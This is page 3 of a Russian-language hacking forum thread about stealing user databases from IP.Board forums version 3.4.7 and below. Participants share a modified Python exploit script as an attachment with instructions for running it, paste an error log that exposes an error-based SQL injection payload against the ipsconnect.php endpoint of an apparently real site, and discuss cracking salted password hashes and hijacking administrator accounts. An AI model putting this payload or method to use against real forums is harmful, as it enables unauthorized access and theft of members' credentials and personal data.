[Уязвимость] Угоняем базу форума IPB версии 3.4.7 и меньше - Страница 3 - Zhyk.Ru Forums
Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация
Навигация
Zhyk.Ru LIVE! Реклама на Zhyk.Ru Доска почета top.zhyk.ru (beta) Премиум-аккаунт

Угоняем базу форума IPB версии 3.4.7 и меньше

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
 
Опции темы Опции просмотра
Старый 18.01.2015, 07:02   #31
 Разведчик
Аватар для N1ON
 
N1ON никому не известный тип
Регистрация: 11.02.2010
Сообщений: 8
Популярность: 16
Сказал(а) спасибо: 7
Поблагодарили 15 раз(а) в 5 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от ZheluddПосмотреть сообщение
Реально всё, но тут соль, так что забудь

Парень, издеваешься? Эта соль уже как сахар)
вот оф. гайд вместе с программой для расшифровки, через вашу видюху.
[Ссылки могут видеть только зарегистрированные пользователи. ]

Вот еще интересный сайт по этой теме:

[Ссылки могут видеть только зарегистрированные пользователи. ]
  Ответить с цитированием
Старый 26.01.2015, 16:23   #32
 Разведчик
Аватар для FadDs
 
FadDs никому не известный тип
Регистрация: 30.01.2012
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для FadDs с помощью Skype™
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Переделал немного скрипт, чтобы дампил всё файл.

На 7-ой строке переменная txtName, вписываем туда имя файла, куда скрипт будет дампить. Файл будет в папке со скриптом, создаётся автоматически. Если забудете поменять имя - существующий не сотрёт, а будет дописывать в имеющийся.

Инструкции:
В папке питона нужно дать запуск от админа файлам python.exe и pythonw.exe, например, так:
[Ссылки могут видеть только зарегистрированные пользователи. ]


Скачайте прикреплённый файл, замените формат на .py Далее, отредактируйте под себя строки 6 и 7, сохраните и запускайте скрипт просто двойным щелчком по .py-файлу.
Или запустите cmd от админа и действуйте как описано в первом посте.

Сильно не пинайте, знаю питон десять минут
Вложения
Тип файла: txt expl.txt (2.6 Кб, 231 просмотров)

Последний раз редактировалось FadDs; 26.01.2015 в 16:31.
  Ответить с цитированием
Старый 28.01.2015, 01:09   #33
 Разведчик
Аватар для mikoto1
 
mikoto1 никому не известный тип
Регистрация: 18.10.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Пробовал по инструкции, выдал лог такого типа.

Microsoft Windows [Version 6.1.7601]
(c) Корпорация Майкрософт (Microsoft Corp.), 2009. Все права защищены.

C:\Users\root> c:\python\python.exe c:\script.py
Error [3], received unexpected data:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------
Date: Mon, 26 Jan 2015 01:53:14 +0000
Error: 1146 - Table 'themoon_forum.members' doesn't exist
IP Address: 108.162.254.137 - /interface/ipsconnect/ipsconnect.php
—-----------------------------------------------------------------------------
--------------------------------------------------------------------------------
-------------------
mySQL query error: SELECT m.*, m.member_id as my_member_id,ccb.cache_content FR
OM ibf_members m LEFT JOIN ibf_content_cache_sigs ccb ON ( ccb.cache_content_id
=m.member_id ) WHERE m.member_id IN (-1,-1) and 1!="'" and extractvalue(1,conc
at(0x3a,(SELECT COUNT(*) FROM members)))#')
.------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------.
| File |
Function |
Line No. |
|----------------------------------------------------------------------------+-
------------------------------------------------------------------------------+-
------------------|
| interface/ipsconnect/ipsconnect.php |
[IPSMember].load |
100 |
'----------------------------------------------------------------------------+-
------------------------------------------------------------------------------+-
------------------'
| |
[ipsConnect].login |
|
'----------------------------------------------------------------------------+-
------------------------------------------------------------------------------+-
------------------'
| interface/ipsconnect/ipsconnect.php |
[].call_user_func_array |
772 |
'----------------------------------------------------------------------------+-
------------------------------------------------------------------------------+-
------------------'

C:\Users\root>
  Ответить с цитированием
Старый 04.02.2015, 03:05   #34
 Разведчик
Аватар для Vebstor23
 
Vebstor23 никому не известный тип
Регистрация: 15.01.2015
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Маловероятно что этот скрипт рабочий т.к. при выводе информации о пользователе, имэйл и пасс не совпадает.
Попробуйте зарегистрируйтесь на форум и посмотрите правильность выдачи данных.
  Ответить с цитированием
Старый 04.02.2015, 16:18   #35
 Разведчик
Аватар для Danique
 
Danique никому не известный тип
Регистрация: 25.12.2014
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Метод рабочий, только уже много где по закрывали дыры. а пароль бессмысленно расшифровывать, есть более лучшие методы для угона админского аккаунта через этот скрипт
  Ответить с цитированием
Старый 04.02.2015, 19:42   #36
 Разведчик
Аватар для Vebstor23
 
Vebstor23 никому не известный тип
Регистрация: 15.01.2015
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Угоняем базу форума IPB версии 3.4.7 и меньше

Цитата:
Сообщение от DaniqueПосмотреть сообщение
Метод рабочий, только уже много где по закрывали дыры. а пароль бессмысленно расшифровывать, есть более лучшие методы для угона админского аккаунта через этот скрипт

Ну если уже много где закрыли дырки где применяется данный скрипт, думаю можно и поделится с угоном админского аккаунта через него?
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продам базу форума игроков WoT kcash World of Tanks 0 31.07.2013 15:29

www.webmoney.ru
Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:37.

Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Protected by GShost.net